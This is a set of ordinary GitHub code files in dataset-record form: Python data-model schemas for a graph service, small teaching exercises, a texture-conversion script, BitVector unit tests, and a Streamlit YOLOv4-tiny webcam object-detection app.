t.ModelPropertyId(uuid4()))\n\n @validates(\"name\")\n def validate_name(self, name):\n # HACK: this validation is defined as a method to work around a\n # circular import between `models.validation` and `models.types`\n from .validate import validate_property_name\n\n try:\n validate_property_name(name)\n except err.PropertyNameValidationError as e:\n raise ValidationError from e\n\n def to_dict_with_string_datatype(self, camel_case: bool = False):\n \"\"\"\n Special method for serializing properties with the datatype represented\n as a serialized JSON dict.\n \"\"\"\n d = self.to_dict(camel_case=camel_case)\n if camel_case:\n d[\"dataType\"] = dt.serialize(self.data_type)\n else:\n d[\"data_type\"] = dt.serialize(self.data_type)\n return d\n\n def __post_init__(self):\n if isinstance(self.data_type, str):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"data_type\", dt.deserialize(self.data_type))\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass ModelRelationshipSchema(CamelCaseSchema):\n id = fields.UUID()\n from_ = fields.UUID(data_key=\"from\")\n to = fields.UUID()\n type = fields.String()\n name = fields.String()\n display_name = fields.String()\n description = fields.String()\n one_to_many = fields.Boolean()\n created_by = fields.String()\n updated_by = fields.String()\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n index = fields.Integer(required=False, allow_none=True, default=None)\n\n @post_load\n def make(self, data, **kwargs):\n return ModelRelationship(**data)\n\n\n@dataclass(frozen=True)\nclass ModelRelationship(Serializable):\n \"\"\"\n A representation of a relationship between two `Model` nodes at the\n schema level of the form:\n\n (m:Model)--[r:MODEL_RELATIONSHIP_TYPE]->(p:Model)\n\n The `one_to_many` property encodes how the relationship can applied at the\n record level:\n\n - one_to_many = True : The relationship can be used to link one record\n to many other records, or potentially none.\n\n - one_to_many = False : The relationship can only be used to link to a\n maximum of one other record (one-to-one). This is how\n \"linked-property\" functionality currently works in the\n concepts-service.\n\n The `index` property stores the display order of linked property\n relationships, like the `ModelProperty.index`. This is returned as\n `position` in the legacy API.\n \"\"\"\n\n __schema__: ClassVar[ModelRelationshipSchema] = ModelRelationshipSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"id\", \"name\", \"display_name\", \"one_to_many\", \"from_\", \"to\"]\n )\n\n id: t.ModelRelationshipId\n one_to_many: bool\n name: t.RelationshipName\n display_name: str\n description: str\n from_: UUID\n to: UUID\n type: t.RelationshipType\n created_by: t.UserNodeId\n updated_by: t.UserNodeId\n created_at: datetime\n updated_at: datetime\n index: Optional[int]\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass PropertyValueSchema(CamelCaseSchema):\n name = fields.String()\n value = fields.Raw()\n\n @post_load\n def make(self, data, **kwargs):\n return PropertyValue(**data)\n\n\n@dataclass(frozen=True)\nclass PropertyValue(Serializable):\n \"\"\"\n Key value structure used to specify property to update for a record\n\n NOTE: this is currently unused but will be needed when we build the legacy/\n backwards-compatible API.\n \"\"\"\n\n __schema__: ClassVar[PropertyValueSchema] = PropertyValueSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"value\"])\n\n name: str\n value: t.GraphValue\n\n\nclass RecordStubSchema(CamelCaseSchema):\n id = fields.UUID()\n title = fields.String(required=False, allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return RecordStub(**data)\n\n\n@dataclass(frozen=True)\nclass RecordStub(Serializable):\n \"\"\"\n A stub of a record which contains partial information about it.\n\n A stub is a reference to a full record containing the ID of the actual\n record along with a string describing the contents of the record itself.\n \"\"\"\n\n __schema__: ClassVar[RecordStubSchema] = RecordStubSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"id\", \"title\"])\n\n id: UUID\n title: Optional[str] = field(default=None)\n\n @classmethod\n def from_node(cls, data: List[Tuple[str, t.GraphValue]]) -> \"RecordStub\":\n values = dict(data)\n title: Optional[str] = cast(Optional[str], values.get(\"title\")) or cast(\n Optional[str], values.get(\"name\")\n )\n id = into_uuid(values[\"@id\"])\n return RecordStub(id=id, title=title)\n\n\nclass RecordSchema(CamelCaseSchema):\n id = fields.UUID()\n values = fields.Dict(keys=fields.Str(), values=fields.Raw())\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n created_by = fields.String()\n updated_by = fields.String()\n\n @pre_dump\n def json_dump_safe(self, record, many=False):\n for k in record.values:\n v = record.values[k]\n if is_datetime(v):\n record.values[k] = normalize_datetime(v)\n return record\n\n @post_load\n def make(self, data, **kwargs):\n return Record(**data)\n\n\n@dataclass(frozen=True, order=True)\nclass Record(Serializable):\n \"\"\"\n A record and associated property values.\n \"\"\"\n\n __schema__: ClassVar[RecordSchema] = RecordSchema(unknown=marshmallow.EXCLUDE)\n\n PUBLIC: ClassVar[Set[str]] = set([\"id\", \"values\"])\n\n id: t.RecordId\n values: Dict[str, Union[t.GraphValue, \"Record\", RecordStub]]\n created_at: datetime\n updated_at: datetime\n created_by: t.UserNodeId\n updated_by: t.UserNodeId\n name: Optional[str] = field(default=None, compare=False)\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n @classmethod\n def from_node(\n cls,\n data: List[Tuple[str, Union[t.GraphValue, \"Record\", RecordStub]]],\n created_at: datetime,\n updated_at: datetime,\n created_by: str,\n updated_by: str,\n property_map: Optional[Dict[str, ModelProperty]] = None,\n fill_missing: bool = False,\n ) -> \"Record\":\n \"\"\"\n Hydrate a `Record` from a Neo4j `Node`.\n\n This assumes that all non-id fields on the Node are property values.\n\n - If a property map is provided, missing default values will be used\n to fill in missing property entries from the `Record#values` member.\n\n - If `fill_missing` is `True` and a property map is provided, any\n property appearing in the property map that is either not present in\n `data` or that does not possess a default value will be set to `None`.\n\n If `fill_missing` is omitted or `False`, no entry will be filled in\n `Record#values`.\n \"\"\"\n values = dict(data)\n\n id = t.RecordId(into_uuid(values.pop(\"@id\")))\n\n # Pop keywords in a loop instead of a dict-comprehension to avoid\n # allocating a new dictionary\n reserved = [k for k in values if is_reserved_property_name(k)]\n for k in reserved:\n values.pop(k)\n\n record = cls(\n id=id,\n values=values,\n created_at=normalize_datetime(created_at),\n updated_at=normalize_datetime(updated_at),\n created_by=t.UserNodeId(created_by),\n updated_by=t.UserNodeId(updated_by),\n name=cls.compute_record_name(property_map, values),\n )\n\n if property_map is not None:\n record.fill_missing_values(property_map, fill_missing=fill_missing)\n\n return record\n\n def embed(self, with_key: str, other: Union[\"Record\", RecordStub]) -> \"Record\":\n \"\"\"\n Embeds the `other` record or stub to the `values` dict of this record\n under under the supplied key `with_key`.\n \"\"\"\n key = humps.decamelize(with_key).lower()\n if key in self.values:\n raise Exception(f\"violation: record linking name already taken: {key}\")\n self.values[key] = other\n return self\n\n def fill_missing_values(\n self, property_map: Dict[str, ModelProperty], fill_missing: bool = False\n ) -> None:\n \"\"\"\n Scan `records` and for each record `r`, populate any properties of `r`\n that have a default value defined for it.\n \"\"\"\n for name, prop in property_map.items():\n # Does the property have a default value?\n if prop.default and (name not in self.values or self.values[name] is None):\n self.values[name] = prop.default_value\n elif fill_missing and name not in self.values:\n # Create an entry for the missing value:\n self.values[name] = None\n\n @staticmethod\n def compute_record_name(\n property_map: Optional[Dict[str, ModelProperty]],\n values: Dict[str, Union[t.GraphValue, \"Record\", RecordStub]],\n ) -> Optional[str]:\n \"\"\"\n The name of the record is the value of the of the \"title\" property for\n the record's model.\n \"\"\"\n if property_map is None:\n return None\n\n title_property = next((p for p in property_map.values() if p.model_title), None)\n if title_property is None:\n return None\n\n title_value = values.get(title_property.name)\n if title_value is None:\n return None\n\n return str(title_value)\n\n\nclass PagedResultSchema(CamelCaseSchema):\n results = fields.Nested(Record.schema(), many=True)\n next_page = fields.Integer(allow_none=True)\n\n @post_load\n def make(self, data, **kwargs):\n return PagedResult(**data)\n\n\n@dataclass(frozen=True)\nclass PagedResult(Serializable):\n \"\"\"\n A paged result\n \"\"\"\n\n __schema__: ClassVar[PagedResultSchema] = PagedResultSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"results\", \"next_page\"])\n\n results: List[Record]\n next_page: Optional[t.NextPageCursor]\n\n @property\n def empty(self):\n return len(self.results) == 0\n\n def __iter__(self):\n return iter(self.results)\n\n def __len__(self):\n return len(self.results)\n\n def __getitem__(self, index):\n return self.results[index]\n\n\nclass RecordRelationshipSchema(CamelCaseSchema):\n id = fields.UUID()\n from_ = fields.UUID(data_key=\"from\")\n to = fields.UUID()\n type = fields.String()\n model_relationship_id = fields.UUID()\n name = fields.String()\n display_name = fields.String()\n one_to_many = fields.Boolean()\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n created_by = fields.String()\n updated_by = fields.String()\n\n @post_load\n def make(self, data, **kwargs):\n return RecordRelationship(**data)\n\n\n@dataclass(frozen=True)\nclass RecordRelationship(FromNodeMixin, Serializable):\n \"\"\"\n A representation of a relationship between two `Record` nodes at the\n instance level of the form:\n\n (r1:Record)--[r:MODEL_RELATIONSHIP_TYPE]->(r2:Record)\n \"\"\"\n\n __schema__: ClassVar[RecordRelationshipSchema] = RecordRelationshipSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"id\", \"from_\", \"to\", \"type\", \"name\", \"model_relationship_id\", \"display_name\"]\n )\n\n from_: t.RecordId\n to: t.RecordId\n type: t.RelationshipType\n model_relationship_id: t.ModelRelationshipId\n name: t.RelationshipName\n display_name: str\n one_to_many: bool\n created_at: datetime\n updated_at: datetime\n created_by: t.UserNodeId\n updated_by: t.UserNodeId\n id: t.RecordRelationshipId\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass PackageProxySchema(CamelCaseSchema):\n id = fields.UUID()\n proxy_instance_id = fields.UUID()\n package_id = fields.Integer()\n package_node_id = fields.String()\n relationship_type = fields.String()\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n created_by = fields.String()\n updated_by = fields.String()\n\n @post_load\n def make(self, data, **kwargs):\n return PackageProxy(**data)\n\n\n@dataclass(frozen=True)\nclass PackageProxy(FromNodeMixin, Serializable):\n\n __schema__: ClassVar[PackageProxySchema] = PackageProxySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"id\", \"proxy_instance_id\", \"package_id\", \"package_node_id\"]\n )\n\n id: UUID\n proxy_instance_id: UUID\n package_id: int\n package_node_id: str\n relationship_type: t.RelationshipName\n created_at: datetime\n updated_at: datetime\n created_by: str\n updated_by: str\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\nclass ProxyRelationshipCountSchema(CamelCaseSchema):\n name = fields.String()\n display_name = fields.String()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return ProxyRelationshipCount(**data)\n\n\n@dataclass(frozen=True)\nclass ProxyRelationshipCount(FromNodeMixin, Serializable):\n\n __schema__: ClassVar[ProxyRelationshipCountSchema] = ProxyRelationshipCountSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n name: str\n display_name: str\n count: int\n\n\n# --- Topology ----------------------------------------------------------------\n\n\nclass ModelTopologySchema(CamelCaseSchema):\n id = fields.UUID()\n name = fields.String()\n display_name = fields.String()\n description = fields.String()\n count = fields.Integer()\n created_at = fields.DateTime(required=False, format=\"iso\")\n updated_at = fields.DateTime(required=False, format=\"iso\")\n\n @post_load\n def make(self, data, **kwargs):\n return ModelTopology(**data)\n\n\n@dataclass(frozen=True)\nclass ModelTopology(Serializable):\n\n __schema__: ClassVar[ModelTopologySchema] = ModelTopologySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\n \"id\",\n \"name\",\n \"display_name\",\n \"description\",\n \"count\",\n \"created_at\",\n \"updated_at\",\n ]\n )\n\n id: UUID\n name: str\n display_name: str\n description: str\n count: int\n created_at: datetime\n updated_at: datetime\n\n def __post_init__(self):\n # HACK: This is required to mutate frozen dataclasses\n object.__setattr__(self, \"created_at\", normalize_datetime(self.created_at))\n object.__setattr__(self, \"updated_at\", normalize_datetime(self.updated_at))\n\n\n# --- Structure ---------------------------------------------------------------\n\n\n@dataclass(frozen=True)\nclass GraphSchemaStructure:\n models: List[Model]\n relationships: List[ModelRelationship]\n\n\n# --- Summary -----------------------------------------------------------------\n\n\nclass ModelSummarySchema(CamelCaseSchema):\n name = fields.String()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return ModelSummary(**data)\n\n\n@dataclass(frozen=True)\nclass ModelSummary(Serializable):\n\n __schema__: ClassVar[ModelSummarySchema] = ModelSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"count\"])\n\n name: str\n count: int\n\n\nclass RelationshipSummarySchema(CamelCaseSchema):\n name = fields.String()\n from_ = fields.UUID(data_key=\"from\")\n to = fields.UUID()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return RelationshipSummary(**data)\n\n\n@dataclass(frozen=True)\nclass RelationshipSummary(Serializable):\n\n __schema__: ClassVar[RelationshipSummarySchema] = RelationshipSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"from_\", \"to\", \"count\"])\n\n name: str\n from_: UUID\n to: UUID\n count: int\n\n\nclass RelationshipTypeSummarySchema(CamelCaseSchema):\n name = fields.String()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return RelationshipTypeSummary(**data)\n\n\nclass RecordSummarySchema(CamelCaseSchema):\n name = fields.String()\n display_name = fields.String()\n count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return RecordSummary(**data)\n\n\n@dataclass(frozen=True)\nclass RecordSummary(Serializable):\n\n __schema__: ClassVar[RecordSummarySchema] = RecordSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"display_name\", \"count\"])\n\n name: str\n display_name: str\n count: int\n\n\n@dataclass(frozen=True)\nclass RelationshipTypeSummary(Serializable):\n\n __schema__: ClassVar[RelationshipTypeSummarySchema] = RelationshipTypeSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"name\", \"count\"])\n\n name: str\n count: int\n\n\nclass TopologySummarySchema(CamelCaseSchema):\n model_summary = fields.Nested(ModelSummary.schema(), many=True)\n relationship_summary = fields.Nested(RelationshipSummary.schema(), many=True)\n relationship_type_summary = fields.Nested(\n RelationshipTypeSummary.schema(), many=True\n )\n model_count = fields.Integer()\n model_record_count = fields.Integer()\n relationship_count = fields.Integer()\n relationship_record_count = fields.Integer()\n relationship_type_count = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return TopologySummary(**data)\n\n\n@dataclass(frozen=True)\nclass TopologySummary(Serializable):\n\n __schema__: ClassVar[TopologySummarySchema] = TopologySummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\n \"model_summary\",\n \"relationship_summary\",\n \"relationship_type_summary\",\n \"model_count\",\n \"model_record_count\",\n \"relationship_count\",\n \"relationship_record_count\",\n \"relationship_type_count\",\n ]\n )\n\n model_summary: ModelSummary\n relationship_summary: RelationshipSummary\n relationship_type_summary: RelationshipTypeSummary\n model_count: int\n model_record_count: int\n relationship_count: int\n relationship_record_count: int\n relationship_type_count: int\n\n\n@dataclass(frozen=False)\nclass CreateRecordRelationship(Serializable):\n\n from .legacy import CreateModelRelationship\n\n from_: t.RecordId\n to: t.RecordId\n model_relationship_to_create: Optional[CreateModelRelationship] = None\n model_relationship: Optional[ModelRelationship] = None\n\n\nclass DatasetDeletionCountsSchema(CamelCaseSchema):\n models = fields.Integer()\n properties = fields.Integer()\n records = fields.Integer()\n packages = fields.Integer()\n relationship_stubs = fields.Integer()\n\n @post_load\n def make(self, data, **kwargs):\n return DatasetDeletionCounts(**data)\n\n\n@dataclass(frozen=False)\nclass DatasetDeletionCounts(Serializable):\n\n __schema__: ClassVar[DatasetDeletionCountsSchema] = DatasetDeletionCountsSchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set(\n [\"models\", \"properties\", \"records\", \"packages\", \"relationship_stubs\"]\n )\n\n models: int\n properties: int\n records: int\n packages: int\n relationship_stubs: int\n\n @classmethod\n def empty(cls):\n return DatasetDeletionCounts(\n models=0, properties=0, records=0, packages=0, relationship_stubs=0\n )\n\n def __add__(self, other) -> \"DatasetDeletionCounts\":\n return DatasetDeletionCounts(\n models=self.models + other.models,\n properties=self.properties + other.properties,\n records=self.records + other.records,\n packages=self.packages + other.packages,\n relationship_stubs=self.relationship_stubs + other.relationship_stubs,\n )\n\n def update(self, counts: \"DatasetDeletionCounts\") -> \"DatasetDeletionCounts\":\n return self + counts\n\n\nclass DatasetDeletionSummarySchema(CamelCaseSchema):\n done = fields.Boolean()\n counts = fields.Nested(DatasetDeletionCounts.schema(), many=False)\n\n @post_load\n def make(self, data, **kwargs):\n return DatasetDeletionSummarySchema(**data)\n\n\n@dataclass(frozen=False)\nclass DatasetDeletionSummary(Serializable):\n\n __schema__: ClassVar[DatasetDeletionSummarySchema] = DatasetDeletionSummarySchema(\n unknown=marshmallow.EXCLUDE\n )\n\n PUBLIC: ClassVar[Set[str]] = set([\"done\", \"counts\"])\n\n done: bool\n counts: DatasetDeletionCounts\n\n def update_counts(self, counts: DatasetDeletionCounts) -> \"DatasetDeletionSummary\":\n return DatasetDeletionSummary(done=self.done, counts=self.counts.update(counts))\n","repo_name":"clohr/model-service","sub_path":"server/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":36652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31447268343","text":"def multiply(a, b): \n ans = 0\n for i in range(a): \n ans += b\n return ans\n\ndef exponent(base, exp): \n ans = 1\n for i in range(exp): \n ans = multiply(ans, base)\n return ans\n\ndef square(n): \n return exponent(n, 2)\n\n#test\nprint(multiply(2, 3),\n exponent(2,3),\nsquare(2))\n","repo_name":"bucs110SPRING23/portfolio-anna-nm","sub_path":"ch05/exercises/scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3557663170","text":"def list_of_dicts(marks):\n result = []\n for i in range(len(marks['Name'])):\n result.append({key : marks[key][i] for key in marks})\n return result\n\nmarks = {'Name': [\"Jan\", \"Piet\", \"Joris\", \"Corneel\"], 'Science': [88, 89, 62, 95], 'Language': [77, 78, 84, 80]}\n\nprint(\"Original dictionary of lists:\")\nprint(marks)\n\n# verwachte output: {'Name': [\"Jan\", \"Piet\", \"Joris\", \"Corneel\"],'Science': [88, 89, 62, 95], 'Language': [77, 78, 84, 80]}\nprint(\"\\nSplit said dictionary of lists into list of dictionaries:\")\nprint(list_of_dicts(marks))\n# verwachte output: \n\n[{'Name': 'Jan', 'Science': 88, 'Language': 77}, {'Name': 'Piet', 'Science': 89, 'Language': 78}, {'Name': 'Joris', 'Science': 62, 'Language': 84}, {'Name': 'Corneel', 'Science': 95, 'Language': 80}]","repo_name":"wackojens/Python101","sub_path":"extra oef kerstvakantie/extraOef3_JC.py","file_name":"extraOef3_JC.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70960771309","text":"import os\r\n\r\ndef txmake(type=\"\"):\r\n # available extension for the tx to work\r\n ext_list = ['.exr','.png','.jpg','.tiff']\r\n\r\n # get current working directory\r\n cwd = os.getcwd()\r\n\r\n # get all the files from the directory\r\n all_files = os.listdir(cwd)\r\n\r\n \r\n\r\n # set extension list\r\n if type == \"\":\r\n extensions = ext_list\r\n else:\r\n # check if the extension is valid\r\n int_ext = [type]\r\n if int_ext[0] in ext_list:\r\n extensions = int_ext\r\n \r\n # remove all the type of files other than the list-> fle_ext\r\n for file in all_files:\r\n raw,ext = os.path.splitext(file)\r\n if ext in extensions:\r\n image_file_path = os.path.join(cwd,raw) + ext\r\n tx_file_path = os.path.join(cwd,raw) + \".tx\"\r\n maketx = f\"maketx -v -u --oiio --checknan --filter lanczos3 {image_file_path} -o {tx_file_path}\"\r\n os.system(maketx)\r\n\r\n \r\n\r\ndef test(type=\"\"):\r\n print(\"hello\")\r\n","repo_name":"deepakxyz/devtry","sub_path":"devtry-cli/tx/txmake.py","file_name":"txmake.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43600623782","text":"import BitVector\nimport unittest\n\nbv1 = BitVector.BitVector( bitstring = '00110011' )\nbv2 = BitVector.BitVector( bitlist = [1,1,1,1,0,0,1,1] )\nbv3 = BitVector.BitVector( bitstring = '00000000111111110000000' )\nbv4 = BitVector.BitVector( bitstring = '' )\nbv5 = BitVector.BitVector( size = 0 )\n\n\n\nlogicTests = [\n ((bv1,bv2, '&'), '00110011'),\n ((bv1,bv3, '&'), ''),\n ((bv1,bv4, '&'), ''),\n ((bv1,bv5, '&'), ''),\n ((bv1,bv2, '|'), '11110011'),\n ((bv1,bv3, '|'), ''),\n ((bv1,bv4, '|'), ''),\n ((bv1,bv5, '|'), ''),\n ((bv1,'', '~'), '11001100'),\n ]\n\nclass BooleanLogicTestCase(unittest.TestCase):\n def checkLogicOp(self):\n print(\"\\nTesting Boolean operators\") \n for args, expected in logicTests:\n try:\n op = args[2]\n if (op == '&'):\n actual = args[0] & args[1]\n elif (op == '|'):\n actual = args[0] | args[1]\n elif (op == '~'):\n actual = ~args[0]\n assert actual == BitVector.BitVector( bitstring = expected )\n except Exception as e:\n if ( args[0].size == args[1].size ):\n print(e)\n print(\" BOOLEAN LOGIC TEST FAILED\")\n\ndef getTestSuites(type):\n return unittest.TestSuite([\n unittest.makeSuite(BooleanLogicTestCase, type)\n ]) \n","repo_name":"phonchi/Interactive-Crypto-HandBook","sub_path":"Misc/TestBitVector/TestBooleanLogic.py","file_name":"TestBooleanLogic.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21075104471","text":"import asyncio\nimport logging\nimport queue\nimport threading\nimport urllib.request\nfrom pathlib import Path\nfrom typing import List, NamedTuple\n\ntry:\n from typing import Literal\nexcept ImportError:\n from typing_extensions import Literal # type: ignore\n\nimport av\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pydub\nimport streamlit as st\nfrom aiortc.contrib.media import MediaPlayer\n\nimport time\nimport pandas as pd\n\n\nfrom streamlit_webrtc import (\n AudioProcessorBase,\n ClientSettings,\n VideoProcessorBase,\n WebRtcMode,\n webrtc_streamer,\n)\n\nHERE = Path(__file__).parent\n\nlogger = logging.getLogger(__name__)\n\n\nst.set_page_config(page_title=\"Object Detection\", page_icon=\"🤖\")\n\n\nWEBRTC_CLIENT_SETTINGS = ClientSettings(\n rtc_configuration={\"iceServers\": [\n {\"urls\": [\"stun:stun.l.google.com:19302\"]}]},\n media_stream_constraints={\n \"video\": True,\n \"audio\": True,\n },\n)\n\n\ndef main():\n\n st.title(\"Lite Real time Object Detection WebApp\")\n st.subheader(\"Using YOLOv4 tiny\")\n\n option = st.selectbox(\n 'Please Select the Configuration file', (\"yolov4-tiny.cfg\",))\n\n option = st.selectbox('Please Select the Weight file',\n (\"yolov4-tiny.weights\",))\n\n with st.spinner('Wait for the Weights and Configuration files to load'):\n time.sleep(3)\n st.success('Done!')\n\n st.info(\"Please wait for 30-40 seconds for the webcam to load with the dependencies\")\n\n app_object_detection()\n\n st.error('Please allow access to camera and microphone in order for this to work')\n st.warning(\n 'The object detection model might varies due to the server speed and internet speed')\n\n st.subheader(\"List of COCO dataset\")\n st.text(\"Total number of dataset are 80\")\n df = pd.read_excel(\"dataset.xlsx\")\n\n st.write(df)\n\n st.subheader(\"How does it work ?\")\n st.text(\"Here is visualization of the algorithm\")\n st.image(\".//Media//pic1.png\", caption=\"YOLO Object Detection of 'Dog', 'Bicycle, 'Car'\", width=None, use_column_width=None,\n clamp=False, channels='RGB', output_format='auto')\n st.image(\"./Media/pic2.png\", caption=\"Algorithm\", width=None, use_column_width=None,\n clamp=False, channels='RGB', output_format='auto')\n\n st.subheader(\"About this App\")\n\n st.markdown(\"\"\"\n This app displays only data from COCO dataset downloaded from https://pjreddie.com/darknet/yolo/\n and the configuration files and weights can be changed from the source code by downloading them from the above website.\n\n You can see how this works in the [see the code](https://github.com/rahularepaka/ObjectDetectionYolov4Web).\n\n \"\"\")\n\n with st.expander(\"Source Code\", expanded=False):\n st.markdown(\"\"\"\n\n https://github.com/rahularepaka/ObjectDetectionYolov4Web/blob/main/src/yolo-main.py\n \n \"\"\")\n\n with st.expander(\"License\"):\n\n st.markdown(\"\"\"\n \n MIT License\n\n Copyright (c) 2021 Rahul Arepaka\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in all\n copies or substantial portions of the Software.\n \"\"\"\n )\n\n st.subheader(\"Author\")\n st.markdown(\n '''\n I am Rahul Arepaka, II year CompSci student at Ecole School of Engineering, Mahindra University\n '''\n '''\n Linkedin Profile : https://www.linkedin.com/in/rahul-arepaka/\n '''\n '''\n Github account : https://github.com/rahularepaka\n '''\n )\n\n st.info(\"Feel free to edit with the source code and enjoy coding\")\n\n logger.debug(\"=== Alive threads ===\")\n for thread in threading.enumerate():\n if thread.is_alive():\n logger.debug(f\" {thread.name} ({thread.ident})\")\n\n\n# Threshold Values\nConf_threshold = 0.4\nNMS_threshold = 0.4\n\n# Colours\nCOLORS = [(0, 255, 0), (0, 0, 255), (255, 0, 0),\n (255, 255, 0), (255, 0, 255), (0, 255, 255)]\n\n# empty list\nclass_name = []\n\n#Coco - Server\nCOCO = \"/app/objectdetectionyolov4web/models/coco.names\"\n\n#Coco - Local\n#COCO = \"models\\\\coco.names\"\n\n\n# for reading all the datasets from the coco.names file into the array\nwith open(COCO, 'rt') as f:\n class_name = f.read().rstrip('\\n').split('\\n')\n\n# configration and weights file location - Server\nmodel_config_file = \"/app/objectdetectionyolov4web/models/yolov4-tiny.cfg\"\nmodel_weight = \"/app/objectdetectionyolov4web/models/yolov4-tiny.weights\"\n\n# configration and weights file location - Local\n#model_config_file = \"models\\\\yolov4-tiny.cfg\"\n#model_weight = \"models\\\\yolov4-tiny.weights\"\n\n\n# darknet files\nnet = cv2.dnn.readNet(model_weight, model_config_file)\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n# Load Model\nmodel = cv2.dnn_DetectionModel(net)\nmodel.setInputParams(size=(416, 416), scale=1/255, swapRB=True)\n\n\ndef app_object_detection():\n\n class Video(VideoProcessorBase):\n\n def recv(self, frame: av.VideoFrame) -> av.VideoFrame:\n image = frame.to_ndarray(format=\"bgr24\")\n\n classes, scores, boxes = model.detect(\n image, Conf_threshold, NMS_threshold)\n for (classid, score, box) in zip(classes, scores, boxes):\n\n color = COLORS[int(classid) % len(COLORS)]\n\n label = \"%s : %f\" % (class_name[classid[0]], score)\n\n cv2.rectangle(image, box, color, 1)\n cv2.putText(image, label, (box[0], box[1]-10),\n cv2.FONT_HERSHEY_COMPLEX, 0.5, color, 1)\n\n return av.VideoFrame.from_ndarray(image, format=\"bgr24\")\n\n webrtc_ctx = webrtc_streamer(\n key=\"object-detection\",\n mode=WebRtcMode.SENDRECV,\n client_settings=WEBRTC_CLIENT_SETTINGS,\n video_processor_factory=Video,\n async_processing=True,\n )\n\n\nif __name__ == \"__main__\":\n import os\n\n DEBUG = os.environ.get(\"DEBUG\", \"false\").lower() not in [\n \"false\", \"no\", \"0\"]\n\n logging.basicConfig(\n format=\"[%(asctime)s] %(levelname)7s from %(name)s in %(pathname)s:%(lineno)d: \"\n \"%(message)s\",\n force=True,\n )\n\n logger.setLevel(level=logging.DEBUG if DEBUG else logging.INFO)\n\n st_webrtc_logger = logging.getLogger(\"streamlit_webrtc\")\n st_webrtc_logger.setLevel(logging.DEBUG)\n\n fsevents_logger = logging.getLogger(\"fsevents\")\n fsevents_logger.setLevel(logging.WARNING)\n\n 